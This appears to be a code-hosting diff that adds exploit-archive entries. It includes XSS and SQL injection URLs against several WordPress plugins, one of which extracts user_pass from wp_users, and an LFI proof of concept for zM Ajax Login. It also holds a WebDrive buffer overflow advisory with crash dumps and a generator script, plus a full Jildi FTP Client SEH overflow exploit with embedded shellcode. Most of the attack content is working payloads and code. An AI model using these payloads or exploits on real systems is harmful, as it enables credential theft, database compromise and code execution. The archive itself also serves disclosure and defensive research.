|
||||||
|
|
||||||
|
Leaflet 0.0.1 is vulnerable; other versions may also be affected.
|
||||||
|
|
||||||
|
http://www.example.com/wp-admin/admin.php?page=leaflet_layer&id=%22%3E%3Cscript%3Ealert%281%29%3C/script%3E
|
9
platforms/php/webapps/37192.txt
Executable file
9
platforms/php/webapps/37192.txt
Executable file
|
@ -0,0 +1,9 @@
|
||||||
|
source: http://www.securityfocus.com/bid/53526/info
|
||||||
|
|
||||||
|
The Leaflet plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
|
||||||
|
|
||||||
|
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
|
||||||
|
|
||||||
|
Leaflet 0.0.1 is vulnerable; other versions may also be affected.
|
||||||
|
|
||||||
|
http://www.example.com/wp-admin/admin.php?page=leaflet_marker&id="><script>alert(1)</script>
|
9
platforms/php/webapps/37193.txt
Executable file
9
platforms/php/webapps/37193.txt
Executable file
|
@ -0,0 +1,9 @@
|
||||||
|
source: http://www.securityfocus.com/bid/53527/info
|
||||||
|
|
||||||
|
The GD Star Rating plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
|
||||||
|
|
||||||
|
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
|
||||||
|
|
||||||
|
GD Star Rating 1.9.16 is vulnerable; other versions may also be affected.
|
||||||
|
|
||||||
|
http://www.example.com/wp-admin/admin.php?page=gd-star-rating-t2 tpl_section=<script>alert(1)</script>&gdsr_create=Create
|
11
platforms/php/webapps/37194.txt
Executable file
11
platforms/php/webapps/37194.txt
Executable file
|
@ -0,0 +1,11 @@
|
||||||
|
source: http://www.securityfocus.com/bid/53529/info
|
||||||
|
|
||||||
|
The Mingle Forum plugin for WordPress is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
|
||||||
|
|
||||||
|
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
|
||||||
|
|
||||||
|
Mingle Forum 1.0.33 is vulnerable; other versions may also be affected.
|
||||||
|
|
||||||
|
http://www.example.com/wp-admin/admin.php?page=mfstructure&mingleforum_action=structure&do=addforum&groupid=%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
|
||||||
|
|
||||||
|
http://www.example.com/wp-admin/admin.php?page=mfgroups&mingleforum_action=usergroups&do=edit_usergroup&usergroup_id=1%27%3%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
|
15
platforms/php/webapps/37195.txt
Executable file
15
platforms/php/webapps/37195.txt
Executable file
|
@ -0,0 +1,15 @@
|
||||||
|
source: http://www.securityfocus.com/bid/53530/info
|
||||||
|
|
||||||
|
WP Forum Server plugin for WordPress is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
|
||||||
|
|
||||||
|
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||||
|
|
||||||
|
WP Forum Server 1.7.3 is vulnerable; other versions may also be affected.
|
||||||
|
|
||||||
|
http://www.example.com/wp-admin/admin.php?page=forum-server/fs-admin/fs-admin.php&vasthtml_action=structure&do=addforum&groupid=%27%3E%3Cscript%3Ealert%281%29%3C/script%3E
|
||||||
|
|
||||||
|
http://www.example.com/wp-admin/admin.php?page=forum-server/fs-admin/fs-admin.php&vasthtml_action=structure&do=editgroup&groupid='><script>alert(document.cookie);</script>
|
||||||
|
|
||||||
|
http://www.example.com/wp-admin/admin.php?page=forum-server/fs-admin/fs-admin.php&vasthtml_action=structure&do=editgroup&groupid=2 AND 1=0 UNION SELECT user_pass FROM wp_users WHERE ID=1
|
||||||
|
|
||||||
|
http://www.example.com/wp-admin/admin.php?page=forum-server/fs-admin/fs-admin.php&vasthtml_action=usergroups&do=edit_usergroup&usergroup_id='><script>alert(document.cookie);</script>
|
14
platforms/php/webapps/37196.txt
Executable file
14
platforms/php/webapps/37196.txt
Executable file
|
@ -0,0 +1,14 @@
|
||||||
|
source: http://www.securityfocus.com/bid/53531/info
|
||||||
|
|
||||||
|
Pretty Link Lite plugin for WordPress is prone to multiple cross-site scripting and SQL-injection vulnerabilities because it fails to properly sanitize user-supplied input.
|
||||||
|
|
||||||
|
Successful exploits will allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||||
|
|
||||||
|
Pretty Link Lite 1.5.2 is vulnerable; other versions may also be affected.
|
||||||
|
|
||||||
|
http://www.example.com/wp-content/plugins/pretty-link/pretty-bar.php?url="><script>alert(document.cookie);</script>
|
||||||
|
|
||||||
|
http://www.example.com/wp-content/plugins/pretty-link/prli-bookmarklet.php?k=c69dbe5f453820a32b0d0b0bb2098d3d&target_url=%23"><script>alert(document.cookie);</script><a name="
|
||||||
|
|
||||||
|
http://www.example.com/wp-admin/admin.php?page=pretty-link/prli-clicks.php&action=csv&l=1%20and%201=0%20UNION%20SELECT%20user_pass%20FROM%20wp_users%20WHERE%20ID=1
|
||||||
|
|
38
platforms/php/webapps/37200.txt
Executable file
38
platforms/php/webapps/37200.txt
Executable file
|
@ -0,0 +1,38 @@
|
||||||
|
# Exploit Title: CVE-2015-4153 - WordPress zM Ajax Login & Register
|
||||||
|
Plugin [Local File Inclusion]
|
||||||
|
# Date: 2015/06/01
|
||||||
|
# Exploit Author: Panagiotis Vagenas
|
||||||
|
# Contact: https://twitter.com/panVagenas
|
||||||
|
# Vendor Homepage: http://zanematthew.com/
|
||||||
|
# Software Link:
|
||||||
|
https://downloads.wordpress.org/plugin/zm-ajax-login-register.1.0.9.zip
|
||||||
|
# Version: 1.0.9
|
||||||
|
# Tested on: WordPress 4.2.2
|
||||||
|
# Category: webapps
|
||||||
|
# CVE: CVE-2015-4153
|
||||||
|
|
||||||
|
* Description
|
||||||
|
|
||||||
|
Any authenticated or non-authenticated user can perform a local file
|
||||||
|
inclusion attack by exploiting the wp_ajax_nopriv_load_template action.
|
||||||
|
Plugin simply includes the file specified in 'template' POST parameter
|
||||||
|
without any further validation.
|
||||||
|
|
||||||
|
* Proof of Concept
|
||||||
|
|
||||||
|
Send a post request to
|
||||||
|
`http://my.vulnerable.website.com/wp-admin/admin-ajax.php` with data:
|
||||||
|
`action=load_template&template=[relative path to local
|
||||||
|
file]&security=[wp nonce]&referer=[action from which the nonce came from]`
|
||||||
|
|
||||||
|
* Timeline
|
||||||
|
|
||||||
|
2015/06/01 Discovered
|
||||||
|
2015/06/01 Vendor alerted via contact form at his website
|
||||||
|
2015/06/03 Vendor responded
|
||||||
|
2015/06/03 Fixed in version 1.1.0
|
||||||
|
|
||||||
|
|
||||||
|
* Solution
|
||||||
|
|
||||||
|
Update to version 1.1.0
|
273
platforms/windows/dos/37188.txt
Executable file
273
platforms/windows/dos/37188.txt
Executable file
|
@ -0,0 +1,273 @@
|
||||||
|
Document Title:
|
||||||
|
===============
|
||||||
|
WebDrive 12.2 (B4172) - Buffer Overflow Vulnerability
|
||||||
|
|
||||||
|
|
||||||
|
References (Source):
|
||||||
|
====================
|
||||||
|
http://www.vulnerability-lab.com/get_content.php?id=1500
|
||||||
|
|
||||||
|
|
||||||
|
Release Date:
|
||||||
|
=============
|
||||||
|
2015-06-01
|
||||||
|
|
||||||
|
|
||||||
|
Vulnerability Laboratory ID (VL-ID):
|
||||||
|
====================================
|
||||||
|
1500
|
||||||
|
|
||||||
|
|
||||||
|
Common Vulnerability Scoring System:
|
||||||
|
====================================
|
||||||
|
6.8
|
||||||
|
|
||||||
|
|
||||||
|
Product & Service Introduction:
|
||||||
|
===============================
|
||||||
|
Unlike a typical FTP client, WebDrive allows you to open and edit server-based, files without the additional step of downloading the file.
|
||||||
|
Using a simple wizard, you assign a network drive letter to the FTP Server. WebDrive supports additional protocols such as WebDAV, SFTP and
|
||||||
|
Amazon S3 and maps a drive letter to each of these servers.You can map unique drive letters to multiple servers.Download the
|
||||||
|
full-function 20-day trial of WebDrive and make file management on remote servers easier and more efficient!
|
||||||
|
|
||||||
|
(Copy of the Vendor Homepage: http://www.webdrive.com/products/webdrive/ )
|
||||||
|
|
||||||
|
|
||||||
|
Abstract Advisory Information:
|
||||||
|
==============================
|
||||||
|
An independent vulnerability laboratory researcher discovered an unicode buffer overflow vulnerability in the official WebDrive v12.2 (Build 4172) 32 bit software.
|
||||||
|
|
||||||
|
|
||||||
|
Vulnerability Disclosure Timeline:
|
||||||
|
==================================
|
||||||
|
2015-06-01: Public Disclosure (Vulnerability Laboratory)
|
||||||
|
|
||||||
|
|
||||||
|
Discovery Status:
|
||||||
|
=================
|
||||||
|
Published
|
||||||
|
|
||||||
|
|
||||||
|
Affected Product(s):
|
||||||
|
====================
|
||||||
|
South River Technologies
|
||||||
|
Product: WebDrive - Software 12.2 (Build 4172) 32 bit
|
||||||
|
|
||||||
|
|
||||||
|
Exploitation Technique:
|
||||||
|
=======================
|
||||||
|
Remote
|
||||||
|
|
||||||
|
|
||||||
|
Severity Level:
|
||||||
|
===============
|
||||||
|
High
|
||||||
|
|
||||||
|
|
||||||
|
Technical Details & Description:
|
||||||
|
================================
|
||||||
|
A buffer overflow software vulnerability has been discovered in the official WebDrive v12.2 (Build 4172) 32 bit software.
|
||||||
|
The buffer overflow vulnerability allows to include unicode strings to basic code inputs from a system user account to compromise the software process or system.
|
||||||
|
|
||||||
|
A fail to sanitize the input of the URL/Address results in compromise of the software system process. Attackers are able to
|
||||||
|
include large unicode strings to overwrite the registers like eip, ebp and co. WebDrive connects to many types of web servers,
|
||||||
|
as well as servers in the cloud. You can use WebDrive to access your files on all of the following server types and protocols:
|
||||||
|
|
||||||
|
WebDAV ------------>Vulnerable
|
||||||
|
WebDAV over SSL---->Vulnerable
|
||||||
|
FTP---------------->Vulnerable
|
||||||
|
FTP over SSL------->Vulnerable
|
||||||
|
Amazon S3---------->Vulnerable
|
||||||
|
SFTP--------------->Vulnerable
|
||||||
|
FrontPage Server--->Vulnerable
|
||||||
|
|
||||||
|
The security risk of the buffer overflow vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.8.
|
||||||
|
Exploitation of the vulnerability requires a low privilege system user account and no user interaction. Successful exploitation of the vulnerability
|
||||||
|
results in system compromise by elevation of privileges via overwrite of the registers.
|
||||||
|
|
||||||
|
Vulnerable Module(s):
|
||||||
|
[+] URL/Address
|
||||||
|
|
||||||
|
Note: Unlike a typical FTP client, WebDrive allows you to open and edit server-based, files without the additional step of downloading the file.
|
||||||
|
Using a simple wizard, you assign a network drive letter to the FTP Server. WebDrive supports additional protocols such as WebDAV, SFTP and Amazon S3 and
|
||||||
|
maps a drive letter to each of these servers.You can map unique drive letters to multiple servers. Download the full-function 20-day trial of WebDrive and
|
||||||
|
make file management on remote servers easier and more efficient!
|
||||||
|
|
||||||
|
|
||||||
|
Proof of Concept (PoC):
|
||||||
|
=======================
|
||||||
|
The buffer overflow web vulnerability can be exploited by local attackers with low privilege system user account and without user interaction.
|
||||||
|
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
|
||||||
|
|
||||||
|
Manual steps to reproduce the vulnerability ...
|
||||||
|
1. Copy the AAAA...string from WebDrive.txt to clipboard
|
||||||
|
2. Create a connection
|
||||||
|
3. Paste it in the URL/Address and attempt to connect.
|
||||||
|
|
||||||
|
|
||||||
|
--- Crash Analysis using WinDBG: [WebDAV] ---
|
||||||
|
(430.9f8): Access violation - code c0000005 (!!! second chance !!!)
|
||||||
|
eax=001cad5c ebx=02283af8 ecx=00000041 edx=02289d9c esi=fdf47264 edi=001cad5c
|
||||||
|
eip=0055ff2b esp=001c8cfc ebp=001c8d00 iopl=0 nv up ei pl nz na pe nc
|
||||||
|
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
|
||||||
|
*** ERROR: Module load completed but symbols could not be loaded for C:\Program Files\WebDrive\webdrive.exe
|
||||||
|
webdrive+0x30ff2b:
|
||||||
|
0055ff2b 66890c16 mov word ptr [esi+edx],cx ds:0023:001d1000=????
|
||||||
|
0:000> !exchain
|
||||||
|
001c8d20: webdrive+35a24e (005aa24e)
|
||||||
|
001cb768: webdrive+1c0041 (00410041)
|
||||||
|
Invalid exception stack at 00410041
|
||||||
|
0:000> d 001cb768
|
||||||
|
001cb768 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
|
||||||
|
001cb778 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
|
||||||
|
001cb788 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
|
||||||
|
001cb798 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
|
||||||
|
001cb7a8 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
|
||||||
|
001cb7b8 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
|
||||||
|
001cb7c8 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
|
||||||
|
001cb7d8 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
|
||||||
|
|
||||||
|
WebDAV over SSL
|
||||||
|
============================
|
||||||
|
Crash Analysis using WinDBG:
|
||||||
|
============================
|
||||||
|
(b88.ca0): Access violation - code c0000005 (!!! second chance !!!)
|
||||||
|
eax=00000000 ebx=00000000 ecx=00410041 edx=775e660d esi=00000000 edi=00000000
|
||||||
|
eip=00410041 esp=000a1238 ebp=000a1258 iopl=0 nv up ei pl zr na pe nc
|
||||||
|
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
|
||||||
|
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Windows\system32\ipworks9.dll -
|
||||||
|
ipworks9!IPWorks_SNPP_Get+0x57f:
|
||||||
|
00410041 038d4df0e8da add ecx,dword ptr [ebp-25170FB3h] ss:0023:daf302a5=????????
|
||||||
|
0:000>!exchain
|
||||||
|
Invalid exception stack at 00410041
|
||||||
|
|
||||||
|
FTP and FTP over SSL
|
||||||
|
============================
|
||||||
|
Crash Analysis using WinDBG:
|
||||||
|
============================
|
||||||
|
(834.70c): Access violation - code c0000005 (!!! second chance !!!)
|
||||||
|
eax=00000000 ebx=00410041 ecx=00000400 edx=00000000 esi=002d84f0 edi=00000000
|
||||||
|
eip=775e64f4 esp=002d8488 ebp=002d84dc iopl=0 nv up ei pl nz na po nc
|
||||||
|
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
|
||||||
|
ntdll!KiFastSystemCallRet:
|
||||||
|
775e64f4 c3 ret
|
||||||
|
0:000> !exchain
|
||||||
|
002d8c1c: webdrive+35a24e (015da24e)
|
||||||
|
002db664: 00410041
|
||||||
|
Invalid exception stack at 00410041
|
||||||
|
|
||||||
|
Amazon S3
|
||||||
|
============================
|
||||||
|
Crash Analysis using WinDBG:
|
||||||
|
============================
|
||||||
|
(a64.a98): Access violation - code c0000005 (!!! second chance !!!)
|
||||||
|
eax=00000000 ebx=00410041 ecx=00000400 edx=00000000 esi=002f8550 edi=00000000
|
||||||
|
eip=775e64f4 esp=002f84e8 ebp=002f853c iopl=0 nv up ei pl nz na po nc
|
||||||
|
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
|
||||||
|
ntdll!KiFastSystemCallRet:
|
||||||
|
775e64f4 c3 ret
|
||||||
|
0:000> !exchain
|
||||||
|
002f8c7c: webdrive+35a24e (015da24e)
|
||||||
|
002fb6c4: 00410041
|
||||||
|
Invalid exception stack at 00410041
|
||||||
|
|
||||||
|
SFTP
|
||||||
|
============================
|
||||||
|
Crash Analysis using WinDBG:
|
||||||
|
============================
|
||||||
|
(848.9a8): Access violation - code c0000005 (!!! second chance !!!)
|
||||||
|
eax=00000000 ebx=00410041 ecx=00000400 edx=00000000 esi=002380f8 edi=00000000
|
||||||
|
eip=775e64f4 esp=00238090 ebp=002380e4 iopl=0 nv up ei pl nz na po nc
|
||||||
|
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
|
||||||
|
ntdll!KiFastSystemCallRet:
|
||||||
|
775e64f4 c3 ret
|
||||||
|
0:000> !exchain
|
||||||
|
00238824: webdrive+35a24e (015da24e)
|
||||||
|
0023b26c: 00410041
|
||||||
|
Invalid exception stack at 00410041
|
||||||
|
|
||||||
|
FrontPage Server
|
||||||
|
============================
|
||||||
|
Crash Analysis using WinDBG:
|
||||||
|
============================
|
||||||
|
(cd4.710): Access violation - code c0000005 (!!! second chance !!!)
|
||||||
|
eax=007ba9f0 ebx=05d29738 ecx=00000041 edx=05d2fd48 esi=faa912b8 edi=007ba9f0
|
||||||
|
eip=003bff2b esp=007b8990 ebp=007b8994 iopl=0 nv up ei pl nz na pe nc
|
||||||
|
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
|
||||||
|
*** ERROR: Module load completed but symbols could not be loaded for C:\Program Files\WebDrive\webdrive.exe
|
||||||
|
webdrive+0x30ff2b:
|
||||||
|
003bff2b 66890c16 mov word ptr [esi+edx],cx ds:0023:007c1000=????
|
||||||
|
0:000> !exchain
|
||||||
|
007b89b4: webdrive+35a24e (0040a24e)
|
||||||
|
007bb3fc: webdrive+360041 (00410041)
|
||||||
|
Invalid exception stack at 00410041
|
||||||
|
'''
|
||||||
|
|
||||||
|
|
||||||
|
PoC: Exploitcode
|
||||||
|
buffer="http://"
|
||||||
|
buffer+="\x41" * 70000
|
||||||
|
off=buffer
|
||||||
|
|
||||||
|
try:
|
||||||
|
out_file = open("WebDrive.txt",'w')
|
||||||
|
out_file.write(off)
|
||||||
|
out_file.close()
|
||||||
|
print("[*] Malicious txt file created successfully")
|
||||||
|
except:
|
||||||
|
print "[!] Error creating file"
|
||||||
|
|
||||||
|
|
||||||
|
Reference(s):
|
||||||
|
http://www.webdrive.com/products/webdrive/
|
||||||
|
https://www.webdrive.com/products/webdrive/download/
|
||||||
|
|
||||||
|
|
||||||
|
Solution - Fix & Patch:
|
||||||
|
=======================
|
||||||
|
The vulnerability can be patched by a secure parse and input restriction of the vulnerable URL/Adress parameters.
|
||||||
|
|
||||||
|
|
||||||
|
Security Risk:
|
||||||
|
==============
|
||||||
|
The security risk of the buffer overflow vulnerability in the URL/Address parameter is estimated as high. (CVSS 6.8)
|
||||||
|
|
||||||
|
|
||||||
|
Credits & Authors:
|
||||||
|
==================
|
||||||
|
metacom
|
||||||
|
|
||||||
|
|
||||||
|
Disclaimer & Information:
|
||||||
|
=========================
|
||||||
|
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
|
||||||
|
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
|
||||||
|
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
|
||||||
|
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
|
||||||
|
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
|
||||||
|
policies, deface websites, hack into databases or trade with fraud/stolen material.
|
||||||
|
|
||||||
|
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
|
||||||
|
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
|
||||||
|
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
|
||||||
|
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
|
||||||
|
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
|
||||||
|
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
|
||||||
|
|
||||||
|
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
|
||||||
|
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
|
||||||
|
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
|
||||||
|
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
|
||||||
|
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
|
||||||
|
|
||||||
|
Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
--
|
||||||
|
VULNERABILITY LABORATORY - RESEARCH TEAM
|
||||||
|
SERVICE: www.vulnerability-lab.com
|
||||||
|
CONTACT: research@vulnerability-lab.com
|
||||||
|
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
|
||||||
|
|
||||||
|
|
58
platforms/windows/local/37197.py
Executable file
58
platforms/windows/local/37197.py
Executable file
|
@ -0,0 +1,58 @@
|
||||||
|
#!/usr/bin/python
|
||||||
|
#Author: Zahid Adeel
|
||||||
|
#Title: Jildi FTP Client 1.5.6 (SEH) BOF
|
||||||
|
#Version: 1.5.6 Build 1536
|
||||||
|
#Software Link: http://usfiles.brothersoft.com/internet/ftp/jildiftp.zip
|
||||||
|
#Tested on: WinXP Professional SP3
|
||||||
|
#Date: 2015-06-03
|
||||||
|
|
||||||
|
#EDB Ref.: https://www.exploit-db.com/exploits/37187/
|
||||||
|
|
||||||
|
#Open jildi-poc.txt file and copy its content on clipboard. Then run Jildi FTP client, click on Connect icon and paste this string in server text input #field. On successful exploitation, you will see calc.exe running on your system.
|
||||||
|
|
||||||
|
fname="jildi-poc.txt"
|
||||||
|
|
||||||
|
junk = "A" * 10096
|
||||||
|
n_seh = "\xeb\x06\x90\x90"
|
||||||
|
ppr = "\x56\x0B\x01\x1B" # PPR in msjet40.dll
|
||||||
|
|
||||||
|
#run your calc.exe
|
||||||
|
shellcode=("\x89\xe5\xd9\xc2\xd9\x75\xf4\x5d\x55\x59\x49\x49\x49\x49\x43"
|
||||||
|
"\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34"
|
||||||
|
"\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41"
|
||||||
|
"\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58"
|
||||||
|
"\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4b\x58\x4b\x39\x43\x30"
|
||||||
|
"\x45\x50\x43\x30\x45\x30\x4c\x49\x5a\x45\x56\x51\x49\x42\x52"
|
||||||
|
"\x44\x4c\x4b\x50\x52\x56\x50\x4c\x4b\x51\x42\x54\x4c\x4c\x4b"
|
||||||
|
"\x56\x32\x54\x54\x4c\x4b\x52\x52\x56\x48\x54\x4f\x4f\x47\x50"
|
||||||
|
"\x4a\x56\x46\x56\x51\x4b\x4f\x56\x51\x49\x50\x4e\x4c\x47\x4c"
|
||||||
|
"\x43\x51\x43\x4c\x54\x42\x56\x4c\x47\x50\x4f\x31\x58\x4f\x54"
|
||||||
|
"\x4d\x43\x31\x49\x57\x4b\x52\x4c\x30\x56\x32\x50\x57\x4c\x4b"
|
||||||
|
"\x56\x32\x52\x30\x4c\x4b\x51\x52\x47\x4c\x43\x31\x58\x50\x4c"
|
||||||
|
"\x4b\x51\x50\x43\x48\x4b\x35\x4f\x30\x54\x34\x51\x5a\x43\x31"
|
||||||
|
"\x4e\x30\x56\x30\x4c\x4b\x51\x58\x45\x48\x4c\x4b\x56\x38\x47"
|
||||||
|
"\x50\x43\x31\x49\x43\x5a\x43\x47\x4c\x47\x39\x4c\x4b\x56\x54"
|
||||||
|
"\x4c\x4b\x43\x31\x49\x46\x50\x31\x4b\x4f\x50\x31\x4f\x30\x4e"
|
||||||
|
"\x4c\x4f\x31\x58\x4f\x54\x4d\x45\x51\x58\x47\x50\x38\x4d\x30"
|
||||||
|
"\x54\x35\x4c\x34\x45\x53\x43\x4d\x4b\x48\x47\x4b\x43\x4d\x51"
|
||||||
|
"\x34\x52\x55\x4d\x32\x50\x58\x4c\x4b\x50\x58\x51\x34\x45\x51"
|
||||||
|
"\x49\x43\x52\x46\x4c\x4b\x54\x4c\x50\x4b\x4c\x4b\x56\x38\x45"
|
||||||
|
"\x4c\x43\x31\x4e\x33\x4c\x4b\x43\x34\x4c\x4b\x45\x51\x58\x50"
|
||||||
|
"\x4d\x59\x50\x44\x47\x54\x51\x34\x51\x4b\x51\x4b\x45\x31\x56"
|
||||||
|
"\x39\x50\x5a\x56\x31\x4b\x4f\x4b\x50\x51\x48\x51\x4f\x50\x5a"
|
||||||
|
"\x4c\x4b\x45\x42\x5a\x4b\x4d\x56\x51\x4d\x52\x4a\x45\x51\x4c"
|
||||||
|
"\x4d\x4b\x35\x4f\x49\x43\x30\x45\x50\x43\x30\x56\x30\x45\x38"
|
||||||
|
"\x56\x51\x4c\x4b\x52\x4f\x4c\x47\x4b\x4f\x4e\x35\x4f\x4b\x4b"
|
||||||
|
"\x4e\x54\x4e\x50\x32\x5a\x4a\x45\x38\x49\x36\x4d\x45\x4f\x4d"
|
||||||
|
"\x4d\x4d\x4b\x4f\x4e\x35\x47\x4c\x45\x56\x43\x4c\x45\x5a\x4d"
|
||||||
|
"\x50\x4b\x4b\x4b\x50\x54\x35\x54\x45\x4f\x4b\x50\x47\x54\x53"
|
||||||
|
"\x52\x52\x52\x4f\x43\x5a\x45\x50\x56\x33\x4b\x4f\x49\x45\x43"
|
||||||
|
"\x53\x45\x31\x52\x4c\x43\x53\x56\x4e\x45\x35\x54\x38\x45\x35"
|
||||||
|
"\x45\x50\x41\x41")
|
||||||
|
|
||||||
|
padding = "F" * (15000 - len(junk) -len(shellcode) - 8)
|
||||||
|
poc = junk + n_seh + ppr + shellcode + padding
|
||||||
|
|
||||||
|
fhandle = open(fname , 'wb')
|
||||||
|
fhandle.write(poc)
|
||||||
|
fhandle.close()
|
Loading…
Add table
Reference in a new issue